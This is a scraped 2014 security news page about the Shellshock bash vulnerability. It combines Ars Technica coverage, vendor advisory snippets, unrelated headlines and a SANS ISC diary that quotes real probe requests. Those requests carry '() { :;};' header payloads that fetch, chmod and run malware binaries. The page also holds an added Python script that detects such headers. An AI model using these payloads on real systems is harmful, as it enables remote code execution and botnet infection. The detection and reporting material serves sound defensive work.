It's now bash-a-mole.

Remember when we said that a new patch had fixed the problems with the last patch to fix the rated-highly-dangerous “Shellshock” bug in the GNU Bourne Again Shell (bash)? You know, that bug that could allow an attacker to remotely execute code on a Linux or Unix system running some configurations of Apache, or perhaps the Git software version control system, DHCP network configuration or any number of other pieces of software that use bash to interact with the underlying operating system? Well, the new patch may not be a complete fix—and there may be vulnerabilities all the way down in the bash code.

Here's how the Shellshock vulnerability works, in a nutshell: an attacker sends a request to a Web server (or Git, a DHCP client, or anything else affected) that uses bash internally to interact with the operating system. This request includes data that ends up stored in an environment variable. Environment variables are like a clipboard for operating systems, storing information that helps the system and the software running on it know where to look for certain files or what configuration to start with. But in this case, the data is malformed so as to trick bash into treating it as a command, and that command is executed as part of what would normally be a benign script. This ability to trick bash is the Shellshock bug. As a result, the attacker can run programs with the same level of access as the part of the system launching the bash shell. And in the case of a web server, that's practically the same level of access as an administrator, giving the attacker a way to gain full control of the targeted system.

David A. Wheeler, a computer scientist who is an acknowledged expert in developing secure open-source code, posted a message to the Open Source Software Security (oss-sec) list this evening urging more changes to the bash code. And other developers have found that the current patch still has vulnerabilities similar to the original one, where an attacker could store malicious data in a variable named the same thing as frequently run commands.




At the Storm Center, we are strict and judicious on moving the InfoCon status. We felt, after dialog, that Yellow is warranted in this case as we are seeing signs of worm/botnet activity. This, combined with so many systems being impacted [worm] and no signs of letting up [met], made the case.

We will monitor this closely and relax InfoCon when the situation seems to be more stable.

Some example requests currently probing for the vulnerability:

GET /cgi-bin/test.sh HTTP/1.0
Host: [host ip address]
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"

ec.z is an obfuscated perl script launching an IRC bot.

This second attack uses multiple headers. We have not yet recovered the 'nginx' binary.

GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
Host: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
User-Agent: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
Cookie: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
Referer: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;

In addition, we have seen numerous scans that will just probe the vulnerability.

[met] https://github.com/rapid7/metasploit-framework/pull/3891
[worm] http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx



Richard W. Porter

rporter at isc dot sans dot edu || @packetalien

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
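The probe requests above all carry the same tell: a header value that begins with the `() {` function-definition marker, which pre-fix bash interpreted as an exported function and then kept executing past the closing brace. The following Python script is an added example, not code from the ISC diary or the Ars article, that parses raw HTTP requests like the two shown, reports every header carrying that marker, and names the CGI environment variable (`HTTP_USER_AGENT` and so on, per the standard CGI header-to-environment mapping) that the header would have become when the server handed the request to a CGI script. The sample requests are constructed inline from the diary's examples, with the download URLs left blank as they are in the diary; a benign request is included to show it is not flagged.

```python
import re
from typing import Dict, List, Tuple

# Marker that pre-fix bash (CVE-2014-6271) used to recognise an exported
# function definition in an environment variable: the value starts with
# "() {". Whitespace between the tokens varies in the wild, hence the regex.
FUNC_DEF_MARKER = re.compile(r"^\s*\(\)\s*\{")

# Constructed sample requests, modelled on the two probes in the ISC diary.
PROBE_ONE = """GET /cgi-bin/test.sh HTTP/1.0
Host: 192.0.2.10
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
"""

PROBE_TWO = """GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
Host: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
User-Agent: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
Cookie: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
Referer: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
"""

# A normal request; braces and parentheses in the middle of a value must not trip the check.
BENIGN = """GET /cgi-bin/status.cgi HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (compatible; ExampleBot/1.0) {}
"""


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into its request line and a header map.
    Header names are lower-cased; the first occurrence of a name wins."""
    lines = raw.strip().splitlines()
    request_line = lines[0].strip()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return request_line, headers


def cgi_env_name(header: str) -> str:
    """Environment variable a CGI server exports the header under:
    HTTP_ prefix, upper-case, '-' replaced by '_' (RFC 3875 convention)."""
    return "HTTP_" + header.upper().replace("-", "_")


def find_shellshock_probes(raw: str) -> List[Dict[str, str]]:
    """Return one finding per header whose value starts with the function
    definition marker: the header name, the environment variable it would
    become, and the trailing text pre-fix bash would have executed."""
    _, headers = parse_request(raw)
    findings: List[Dict[str, str]] = []
    for name, value in headers.items():
        if FUNC_DEF_MARKER.match(value):
            # Everything after the (empty) function body's closing brace is
            # the part that should never have been evaluated.
            trailing = value.split("}", 1)[1].lstrip(" ;").strip()
            findings.append({"header": name, "env": cgi_env_name(name), "trailing": trailing})
    return findings


if __name__ == "__main__":
    for label, raw in (("probe one", PROBE_ONE), ("probe two", PROBE_TWO), ("benign", BENIGN)):
        hits = find_shellshock_probes(raw)
        print(f"{label}: {len(hits)} flagged header(s)")
        for hit in hits:
            print(f"  {hit['header']} -> {hit['env']}: {hit['trailing'][:60]}")
```

The check is deliberately anchored at the start of the header value, because that is the only position in which bash's importer recognised a function definition; matching `() {` anywhere in a value would flag harmless user agents. The same routine applies to any other header the server exports, which is why the second probe's Host, Cookie and Referer values are all reported.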

Update, 9/26 11:00 PM ET: The most recent patches issued for the "Shellshock" bug have apparently still left avenues of attack, based on the analysis of several open source developers. See the latest report for further information.

After the discovery that a patch designed to repair the “Shellshock” vulnerability in the GNU Bourne Again Shell (bash) still allowed for an attacker to execute commands on a remote system, Red Hat, Ubuntu, and other Linux distribution providers have pushed out a second fix to the vulnerability. At the same time, security researchers and service providers have detected a surge in scans for systems with the vulnerability, as would-be attackers seek to take advantage of the bug.

“Shellshock” has been compared to the Heartbleed bug discovered in the OpenSSL cryptography library in April because of its potential severity and its widespread nature. Like Heartbleed, the Shellshock vulnerabilities were introduced by errors in coding years ago—errors made by an unpaid volunteer writing code that would end up in millions of computer systems.


Go TLS Server Implementation Security Bypass Vulnerability
LinuxSecurity.com: It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands.
LinuxSecurity.com: Security Report Summary
LinuxSecurity.com: Updated nss packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7. Red Hat Product Security has rated this update as having Important security impact.
LinuxSecurity.com: Bash allowed bypassing environment restrictions in certain environments.
LinuxSecurity.com: Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7. Red Hat Product Security has rated this update as having Important security impact.
LinuxSecurity.com: New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.

Apple has responded to concerns about “Shellshock,” a pair of vulnerabilities in versions of the GNU Bourne-Again Shell (bash), issuing a statement that the company is “working to quickly provide a fix” to the vulnerability. However, a company spokesperson said that most Mac OS X users have nothing to fear.

In an email to Ars Technica, an Apple spokesperson provided the following statement from the company:

"The vast majority of OS X users are not at risk to recently reported bash vulnerabilities. Bash, a UNIX command shell and language included in OS X, has a weakness that could allow unauthorized users to remotely gain control of vulnerable systems. With OS X, systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services. We are working to quickly provide a software update for our advanced UNIX users.”

Update: Chet Ramey, the maintainer of bash, said in a post to Twitter that he had notified Apple of the vulnerability several times before it was made public, "and sent a patch they can apply. Several messages." So it's not certain why Apple hasn't already packaged that fix for release, other than


EMC AlphaStor Format String and Command Injection Vulnerabilities
SmarterTools Smarter Track 6-10 - Information Disclosure Vulnerability
Oracle Corporation MyOracle - Persistent Vulnerability
GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability
Paypal Inc Bug Bounty #32 - Multiple Persistent Vulnerabilities
Paypal Inc Bug Bounty #16 - Persistent Mail Encoding Vulnerability

Posted by InfoSec News on Sep 26


By John E. Dunn
26 September 2014

Britain’s banks are to start using a new alerting system that will make it
easier for a range of police and government agencies to warn its members
of cyberattacks and frauds in real time.

Going live in early 2015 in partnership with BAE Systems Applied
Intelligence, the Financial Crime...
Cart Engine Multiple Security Vulnerabilities
HAProxy Multiple Buffer Overflow Vulnerabilities

Posted by InfoSec News on Sep 26


By Sean Gallagher
Ars Technica
Sept 25, 2014

The vulnerability reported in the GNU Bourne Again Shell (Bash) yesterday,
dubbed "Shellshock," may already have been exploited in the wild to take
over Web servers as part of a botnet. More security experts are now
weighing in on the severity of the bug, expressing fears that...

Posted by InfoSec News on Sep 26


By Jessica Herrera-Flanigan
September 25, 2014

Next Wednesday marks the beginning of the 11th annual Cybersecurity
Awareness Month.

The Department of Homeland Security says the month is designed to “engage
and educate public and private sector partners through events and
initiatives with the goal of raising awareness about...

Posted by InfoSec News on Sep 26


By William Knowles @c4i
Senior Editor
InfoSec News
September 24, 2014

Somewhat Freaky Fast Notification.

Champaign, Illinois based Jimmy John’s Gourmet Sandwiches Shops
announced on Wednesday they were the latest business to suffer a credit
card breach, joining the ranks of Target, Neiman Marcus, Michaels, and
Home Depot.

Here’s the company...

Posted by InfoSec News on Sep 26


Los Angeles Times
Sept 25, 2014

Hey, what's Thor doing sitting at a computer terminal? Saving the day, of

Chris Hemsworth, best known for his role as an Asgardian superhero in
Marvel's "Thor" and "Avengers" movies, has traded his hammer for a
keyboard in the...

Posted by InfoSec News on Sep 26


By Tim Greene
Sept 24, 2014

A new malware kit called Spike can infect not only traditional desktops
but also routers, smart thermostats, smart dryers and a host of other
Internet of Things devices to herd them into massive botnets.

Spike botnets have carried out various forms...

Posted by InfoSec News on Sep 26


By Cadie Thompson
Sept 25, 2014

Hacking medical data has become a booming business, and attacks against
hospitals are up 600 percent in 2014, a security company CEO told CNBC.

The increase in data-sharing, and the growth of the Internet of everything
may be good for medicine, but it's creating a security nightmare for the
health-care industry, said John McCormack, chief executive...
[ MDVSA-2014:190 ] bash
[SECURITY] [DSA 3036-1] mediawiki security update
Cisco Security Advisory: GNU Bash Environmental Variable Command Injection Vulnerability
[slackware-security] bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)
[SECURITY] [DSA 3035-1] bash security update
Microsoft Internet Explorer CVE-2014-4067 Remote Memory Corruption Vulnerability
Internet Storm Center Infocon Status